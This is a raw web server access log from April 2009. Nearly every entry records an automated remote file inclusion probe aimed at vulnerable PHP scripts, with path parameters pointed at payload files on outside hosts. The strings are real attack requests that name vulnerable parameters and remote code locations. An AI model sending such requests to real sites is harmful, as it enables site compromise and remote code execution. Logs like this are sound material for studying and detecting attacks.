211.115.89.68 - - [27/Apr/2009:06:46:49 -0500] "GET /logs/access_log.1231718400//zb1//skin/zero_vote/ask_password.php?dir=http://jeta.co.kr//bbs/component/.jpg/kantap.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
211.115.89.68 - - [27/Apr/2009:06:46:56 -0500] "GET /logs/access_log.1236643200//zb1//skin/zero_vote/ask_password.php?dir=http://jeta.co.kr//bbs/component/.jpg/kantap.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
211.115.89.68 - - [27/Apr/2009:06:47:20 -0500] "GET /logs/access_log.1231718400//zb1//skin/zero_vote/ask_password.php?dir=http://jeta.co.kr//bbs/component/.jpg/kantap.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
211.115.89.68 - - [27/Apr/2009:06:47:21 -0500] "GET //zb1//skin/zero_vote/ask_password.php?dir=http://jeta.co.kr//bbs/component/.jpg/kantap.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
211.115.89.68 - - [27/Apr/2009:06:47:21 -0500] "GET /logs//zb1//skin/zero_vote/ask_password.php?dir=http://jeta.co.kr//bbs/component/.jpg/kantap.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
211.115.89.68 - - [27/Apr/2009:06:47:26 -0500] "GET /logs/access_log.1236643200//zb1//skin/zero_vote/ask_password.php?dir=http://jeta.co.kr//bbs/component/.jpg/kantap.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
168.209.97.34 - - [27/Apr/2009:06:47:39 -0500] "GET //ashnews.php?pathtoashnews=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 295 "-""Mozilla/5.0"
168.209.97.34 - - [27/Apr/2009:06:47:39 -0500] "GET /logs//ashnews.php?pathtoashnews=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 300 "-""Mozilla/5.0"
168.209.97.34 - - [27/Apr/2009:06:47:40 -0500] "GET /logs/access_log.1239667200//ashnews.php?pathtoashnews=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 322 "-""Mozilla/5.0"
168.209.97.34 - - [27/Apr/2009:06:49:55 -0500] "GET /logs/access_log.1239753600//ashnews.php?pathtoashnews=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 322 "-""Mozilla/5.0"
77.221.130.22 - - [27/Apr/2009:06:54:58 -0500] "GET /?GALLERY_BASEDIR=http://208.98.22.241/id.txt?%0D?? HTTP/1.1" 200 3245 "-""libwww-perl/5.805"
77.221.130.22 - - [27/Apr/2009:06:54:59 -0500] "GET /logs/?GALLERY_BASEDIR=http://208.98.22.241/id.txt?%0D?? HTTP/1.1" 200 187151 "-""libwww-perl/5.805"
216.104.37.122 - - [27/Apr/2009:06:58:21 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 335 "-""libwww-perl/5.825"
216.104.37.122 - - [27/Apr/2009:06:58:21 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 330 "-""libwww-perl/5.825"
217.172.186.250 - - [27/Apr/2009:06:58:24 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
217.172.186.250 - - [27/Apr/2009:06:58:24 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
217.172.186.250 - - [27/Apr/2009:06:58:24 -0500] "GET /logs/access_log.1237680000//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
77.221.130.22 - - [27/Apr/2009:06:58:24 -0500] "GET /?GALLERY_BASEDIR=http://208.98.22.241/id.txt?%0D?? HTTP/1.1" 200 3245 "-""libwww-perl/5.805"
77.221.130.22 - - [27/Apr/2009:06:58:26 -0500] "GET /logs/?GALLERY_BASEDIR=http://208.98.22.241/id.txt?%0D?? HTTP/1.1" 200 187151 "-""libwww-perl/5.805"
195.116.31.151 - - [27/Apr/2009:07:01:38 -0500] "GET /logs//include/footer.php?_path[counter]=http://lovesex.altervista.org/id.txt? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
195.116.31.151 - - [27/Apr/2009:07:01:39 -0500] "GET //include/footer.php?_path[counter]=http://lovesex.altervista.org/id.txt? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
195.116.31.151 - - [27/Apr/2009:07:01:40 -0500] "GET /logs//include/footer.php?_path[counter]=http://lovesex.altervista.org/id.txt? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
195.116.31.151 - - [27/Apr/2009:07:01:41 -0500] "GET //include/footer.php?_path[counter]=http://lovesex.altervista.org/id.txt? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
83.226.185.169 - - [27/Apr/2009:07:02:18 -0500] "GET /technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://kaitenz.altervista.org/id.txt??? HTTP/1.1" 404 340 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
83.226.185.169 - - [27/Apr/2009:07:02:18 -0500] "GET /logs/access_log.1233705600/technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://kaitenz.altervista.org/id.txt??? HTTP/1.1" 404 367 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
83.226.185.169 - - [27/Apr/2009:07:02:18 -0500] "GET /logs/technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://kaitenz.altervista.org/id.txt??? HTTP/1.1" 404 345 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
83.226.185.169 - - [27/Apr/2009:07:02:18 -0500] "GET /logs/access_log.1237161600/technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://kaitenz.altervista.org/id.txt??? HTTP/1.1" 404 367 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
83.226.185.169 - - [27/Apr/2009:07:02:18 -0500] "GET /logs/access_log.1233705600/technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://kaitenz.altervista.org/id.txt??? HTTP/1.1" 404 367 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
83.226.185.169 - - [27/Apr/2009:07:02:18 -0500] "GET /technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://kaitenz.altervista.org/id.txt??? HTTP/1.1" 404 340 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
83.226.185.169 - - [27/Apr/2009:07:02:18 -0500] "GET /logs/technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://kaitenz.altervista.org/id.txt??? HTTP/1.1" 404 345 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
83.226.185.169 - - [27/Apr/2009:07:02:18 -0500] "GET /logs/access_log.1237161600/technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://kaitenz.altervista.org/id.txt??? HTTP/1.1" 404 367 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
149.156.18.19 - - [27/Apr/2009:07:02:55 -0500] "GET /logs//include/footer.php?_path[counter]=http://lovesex.altervista.org/id.txt? HTTP/1.1" 404 307 "-""libwww-perl/5.808"
149.156.18.19 - - [27/Apr/2009:07:02:55 -0500] "GET /logs//include/footer.php?_path[counter]=http://lovesex.altervista.org/id.txt? HTTP/1.1" 404 307 "-""libwww-perl/5.808"
149.156.18.19 - - [27/Apr/2009:07:02:55 -0500] "GET //include/footer.php?_path[counter]=http://lovesex.altervista.org/id.txt? HTTP/1.1" 404 302 "-""libwww-perl/5.808"
149.156.18.19 - - [27/Apr/2009:07:02:55 -0500] "GET //include/footer.php?_path[counter]=http://lovesex.altervista.org/id.txt? HTTP/1.1" 404 302 "-""libwww-perl/5.808"
218.185.20.88 - - [27/Apr/2009:07:03:37 -0500] "GET /logs/errors.php?error=http://www.koeln-ks.de/temp/rfi.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
218.185.20.88 - - [27/Apr/2009:07:03:37 -0500] "GET /errors.php?error=http://www.koeln-ks.de/temp/rfi.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
218.185.20.88 - - [27/Apr/2009:07:04:10 -0500] "GET /logs/errors.php?error=http://www.koeln-ks.de/temp/rfi.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
218.185.20.88 - - [27/Apr/2009:07:04:10 -0500] "GET /errors.php?error=http://www.koeln-ks.de/temp/rfi.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
83.226.185.169 - - [27/Apr/2009:07:04:20 -0500] "GET /technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://kaitenz.altervista.org/id.txt??? HTTP/1.1" 404 340 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
83.226.185.169 - - [27/Apr/2009:07:04:20 -0500] "GET /logs/technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://kaitenz.altervista.org/id.txt??? HTTP/1.1" 404 345 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
83.226.185.169 - - [27/Apr/2009:07:04:20 -0500] "GET /logs/access_log.1233705600/technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://kaitenz.altervista.org/id.txt??? HTTP/1.1" 404 367 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
83.226.185.169 - - [27/Apr/2009:07:04:20 -0500] "GET /logs/access_log.1237161600/technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://kaitenz.altervista.org/id.txt??? HTTP/1.1" 404 367 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
83.226.185.169 - - [27/Apr/2009:07:04:28 -0500] "GET /technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://kaitenz.altervista.org/id.txt??? HTTP/1.1" 404 340 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
83.226.185.169 - - [27/Apr/2009:07:04:28 -0500] "GET /logs/technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://kaitenz.altervista.org/id.txt??? HTTP/1.1" 404 345 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
83.226.185.169 - - [27/Apr/2009:07:04:28 -0500] "GET /logs/access_log.1233705600/technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://kaitenz.altervista.org/id.txt??? HTTP/1.1" 404 367 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
83.226.185.169 - - [27/Apr/2009:07:04:28 -0500] "GET /logs/access_log.1237161600/technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://kaitenz.altervista.org/id.txt??? HTTP/1.1" 404 367 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
67.15.48.60 - - [27/Apr/2009:07:05:17 -0500] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.cwba.ca/calendar/thyme//modules/sync/id??? HTTP/1.1" 404 293 "-""libwww-perl/5.810"
67.15.48.60 - - [27/Apr/2009:07:05:17 -0500] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.cwba.ca/calendar/thyme//modules/sync/id??? HTTP/1.1" 404 298 "-""libwww-perl/5.810"
64.56.65.106 - - [27/Apr/2009:07:05:52 -0500] "GET /logs//includes/ktedit/toolbar.php.banned/includes/ktedit/toolbar.php?dirDepth=http://gelora.hostse.com/gid.txt??? HTTP/1.1" 404 351 "-""libwww-perl/5.819"
64.56.65.106 - - [27/Apr/2009:07:05:52 -0500] "GET //includes/ktedit/toolbar.php.banned/includes/ktedit/toolbar.php?dirDepth=http://gelora.hostse.com/gid.txt??? HTTP/1.1" 404 346 "-""libwww-perl/5.819"
168.209.97.34 - - [27/Apr/2009:07:08:50 -0500] "GET /logs/access_log.1237939200//citywriter/head.php?path=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 330 "-""Mozilla/5.0"
168.209.97.34 - - [27/Apr/2009:07:08:51 -0500] "GET //citywriter/head.php?path=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 303 "-""Mozilla/5.0"
168.209.97.34 - - [27/Apr/2009:07:08:51 -0500] "GET /logs//citywriter/head.php?path=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 308 "-""Mozilla/5.0"
217.27.212.129 - - [27/Apr/2009:07:10:56 -0500] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://request.clubstyle.fm/req/v1.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
217.27.212.129 - - [27/Apr/2009:07:10:57 -0500] "GET //tools/send_reminders.php?noSet=0&includedir=http://request.clubstyle.fm/req/v1.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
217.27.212.129 - - [27/Apr/2009:07:10:57 -0500] "GET /logs/access_log.1228867200//tools/send_reminders.php?noSet=0&includedir=http://request.clubstyle.fm/req/v1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
168.209.97.34 - - [27/Apr/2009:07:12:48 -0500] "GET //agendax/addevent.inc.php?agendax_path=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 308 "-""Mozilla/5.0"
168.209.97.34 - - [27/Apr/2009:07:12:48 -0500] "GET /logs/access_log.1239667200//agendax/addevent.inc.php?agendax_path=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 335 "-""Mozilla/5.0"
168.209.97.34 - - [27/Apr/2009:07:12:49 -0500] "GET /logs//agendax/addevent.inc.php?agendax_path=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 313 "-""Mozilla/5.0"
195.35.82.155 - - [27/Apr/2009:07:13:50 -0500] "GET /logs/access_log.1230076800//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://wuni.net//GUESTBOOK/id1.txt?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
195.35.82.155 - - [27/Apr/2009:07:13:50 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://wuni.net//GUESTBOOK/id1.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
195.35.82.155 - - [27/Apr/2009:07:13:50 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://wuni.net//GUESTBOOK/id1.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
195.35.82.155 - - [27/Apr/2009:07:13:50 -0500] "GET /logs/access_log.1230163200//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://wuni.net//GUESTBOOK/id1.txt?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
168.209.97.34 - - [27/Apr/2009:07:14:22 -0500] "GET /logs/access_log.1238112000//agendax/addevent.inc.php?agendax_path=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 335 "-""Mozilla/5.0"
74.55.30.194 - - [27/Apr/2009:07:15:07 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.winewise.de///administrator/components/com_virtuemart/uiu.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
74.55.30.194 - - [27/Apr/2009:07:15:07 -0500] "GET /logs/access_log.1230076800//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.winewise.de///administrator/components/com_virtuemart/uiu.txt?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
74.55.30.194 - - [27/Apr/2009:07:15:07 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.winewise.de///administrator/components/com_virtuemart/uiu.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
74.55.30.194 - - [27/Apr/2009:07:15:12 -0500] "GET /logs/access_log.1230163200//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.winewise.de///administrator/components/com_virtuemart/uiu.txt?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
74.55.30.194 - - [27/Apr/2009:07:15:35 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.winewise.de///administrator/components/com_virtuemart/uiu.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
74.55.30.194 - - [27/Apr/2009:07:15:35 -0500] "GET /logs/access_log.1230076800//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.winewise.de///administrator/components/com_virtuemart/uiu.txt?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
74.55.30.194 - - [27/Apr/2009:07:15:35 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.winewise.de///administrator/components/com_virtuemart/uiu.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
74.55.30.194 - - [27/Apr/2009:07:15:39 -0500] "GET /logs/access_log.1230163200//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.winewise.de///administrator/components/com_virtuemart/uiu.txt?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
60.249.11.3 - - [27/Apr/2009:07:18:37 -0500] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.eforel.com/ecommerce/plugins/docman/idr.txt???? HTTP/1.1" 404 316 "-""libwww-perl/5.79"
60.249.11.3 - - [27/Apr/2009:07:18:38 -0500] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.eforel.com/ecommerce/plugins/docman/idr.txt???? HTTP/1.1" 404 311 "-""libwww-perl/5.79"
67.15.48.60 - - [27/Apr/2009:07:18:54 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.cwba.ca/calendar/thyme//modules/sync/id??? HTTP/1.1" 404 298 "-""libwww-perl/5.810"
67.15.48.60 - - [27/Apr/2009:07:18:54 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.cwba.ca/calendar/thyme//modules/sync/id??? HTTP/1.1" 404 293 "-""libwww-perl/5.810"
81.176.226.100 - - [27/Apr/2009:07:19:51 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://data.donkeyhote.co.kr/xsl/copyright.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
81.176.226.100 - - [27/Apr/2009:07:19:52 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://data.donkeyhote.co.kr/xsl/copyright.txt?? HTTP/1.1" 404 330 "-""libwww-perl/5.805"
69.64.34.249 - - [27/Apr/2009:07:21:01 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.bluebrad.com/idx33xid.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
69.64.34.249 - - [27/Apr/2009:07:21:01 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.bluebrad.com/idx33xid.txt?? HTTP/1.1" 404 330 "-""libwww-perl/5.805"
74.55.30.194 - - [27/Apr/2009:07:25:48 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.koeln-ks.de/temp/scan.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
74.55.30.194 - - [27/Apr/2009:07:25:48 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.koeln-ks.de/temp/scan.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
74.55.30.194 - - [27/Apr/2009:07:25:48 -0500] "GET /logs/access_log.1239408000///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.koeln-ks.de/temp/scan.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
74.55.30.194 - - [27/Apr/2009:07:25:51 -0500] "GET /logs/access_log.1239408000///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.koeln-ks.de/temp/scan.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
74.55.30.194 - - [27/Apr/2009:07:25:51 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.koeln-ks.de/temp/scan.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
74.55.30.194 - - [27/Apr/2009:07:25:51 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.koeln-ks.de/temp/scan.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
202.190.70.69 - - [27/Apr/2009:07:27:08 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://net.yjc.ac.kr//bbs/icon/chi.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.825"
202.190.70.69 - - [27/Apr/2009:07:27:08 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://net.yjc.ac.kr//bbs/icon/chi.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.825"
202.75.4.169 - - [27/Apr/2009:07:30:10 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://home.covenantberks.org/images/kampret.jpg?? HTTP/1.1" 404 338 "-""libwww-perl/5.79"
202.75.4.169 - - [27/Apr/2009:07:30:11 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://home.covenantberks.org/images/kampret.jpg?? HTTP/1.1" 404 333 "-""libwww-perl/5.79"
200.103.16.43 - - [27/Apr/2009:07:30:23 -0500] "GET /logs/access_log.1239408000/?my_ms[root]=http://plengeh.co.cc/scripts/id1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
200.103.16.43 - - [27/Apr/2009:07:30:23 -0500] "GET /?my_ms[root]=http://plengeh.co.cc/scripts/id1.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
200.103.16.43 - - [27/Apr/2009:07:30:25 -0500] "GET /logs/?my_ms[root]=http://plengeh.co.cc/scripts/id1.txt?? HTTP/1.1" 200 187151 "-""Mozilla/5.0"
69.64.34.249 - - [27/Apr/2009:07:31:33 -0500] "GET /logs/errors.php?error=http://www.bluebrad.com/idx33xid.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
69.64.34.249 - - [27/Apr/2009:07:31:33 -0500] "GET /errors.php?error=http://www.bluebrad.com/idx33xid.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
67.15.48.60 - - [27/Apr/2009:07:32:53 -0500] "GET /logs/inc/cmses/aedatingCMS.php?dir[inc]=http://www.cwba.ca/calendar/thyme//modules/sync/id??? HTTP/1.1" 404 313 "-""libwww-perl/5.810"
67.15.48.60 - - [27/Apr/2009:07:32:53 -0500] "GET /inc/cmses/aedatingCMS.php?dir[inc]=http://www.cwba.ca/calendar/thyme//modules/sync/id??? HTTP/1.1" 404 308 "-""libwww-perl/5.810"
64.191.102.117 - - [27/Apr/2009:07:35:11 -0500] "GET /logs/bbshop/admin/index.php?_shop_path=http://www.thenakedtruckerandt-bones.com/echo.txt???? HTTP/1.1" 404 310 "-""libwww-perl/5.822"
64.191.102.117 - - [27/Apr/2009:07:35:12 -0500] "GET /bbshop/admin/index.php?_shop_path=http://www.thenakedtruckerandt-bones.com/echo.txt???? HTTP/1.1" 404 305 "-""libwww-perl/5.822"
208.80.195.36 - - [27/Apr/2009:07:36:02 -0500] "GET / HTTP/1.0" 200 3233 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; University of Leicester; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
217.199.222.19 - - [27/Apr/2009:07:38:00 -0500] "GET /logs//inc/shows.inc.php?cutepath=http://hotels.ivycanada.ca/bbs/data/id.txt??? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
217.199.222.19 - - [27/Apr/2009:07:38:00 -0500] "GET //inc/shows.inc.php?cutepath=http://hotels.ivycanada.ca/bbs/data/id.txt??? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
217.199.222.19 - - [27/Apr/2009:07:38:04 -0500] "GET /logs//inc/shows.inc.php?cutepath=http://hotels.ivycanada.ca/bbs/data/id.txt??? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
217.199.222.19 - - [27/Apr/2009:07:38:04 -0500] "GET //inc/shows.inc.php?cutepath=http://hotels.ivycanada.ca/bbs/data/id.txt??? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
168.209.97.34 - - [27/Apr/2009:07:42:17 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 340 "-""Mozilla/5.0"
168.209.97.34 - - [27/Apr/2009:07:42:17 -0500] "GET /logs/access_log.1239408000///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 362 "-""Mozilla/5.0"
168.209.97.34 - - [27/Apr/2009:07:42:17 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 335 "-""Mozilla/5.0"
69.64.34.249 - - [27/Apr/2009:07:43:12 -0500] "GET /logs/errors.php?error=http://www.bluebrad.com/idx33xid.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
69.64.34.249 - - [27/Apr/2009:07:43:12 -0500] "GET /errors.php?error=http://www.bluebrad.com/idx33xid.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
62.149.18.33 - - [27/Apr/2009:07:44:20 -0500] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.irisjobstation.com/peruzaklaknat/scan4/fx29id1.txt?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
62.149.18.33 - - [27/Apr/2009:07:44:20 -0500] "GET /logs/access_log.1239235200/joomla/index.php?option=com_restaurante&task=http://www.irisjobstation.com/peruzaklaknat/scan4/fx29id1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
62.149.18.33 - - [27/Apr/2009:07:44:20 -0500] "GET /joomla/index.php?option=com_restaurante&task=http://www.irisjobstation.com/peruzaklaknat/scan4/fx29id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
62.149.18.33 - - [27/Apr/2009:07:44:20 -0500] "GET /logs/access_log.1238976000/joomla/index.php?option=com_restaurante&task=http://www.irisjobstation.com/peruzaklaknat/scan4/fx29id1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
62.149.18.33 - - [27/Apr/2009:07:44:41 -0500] "GET /logs/access_log.1239667200/joomla/index.php?option=com_restaurante&task=http://www.irisjobstation.com/peruzaklaknat/scan4/fx29id1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
168.209.97.34 - - [27/Apr/2009:07:46:03 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 340 "-""Mozilla/5.0"
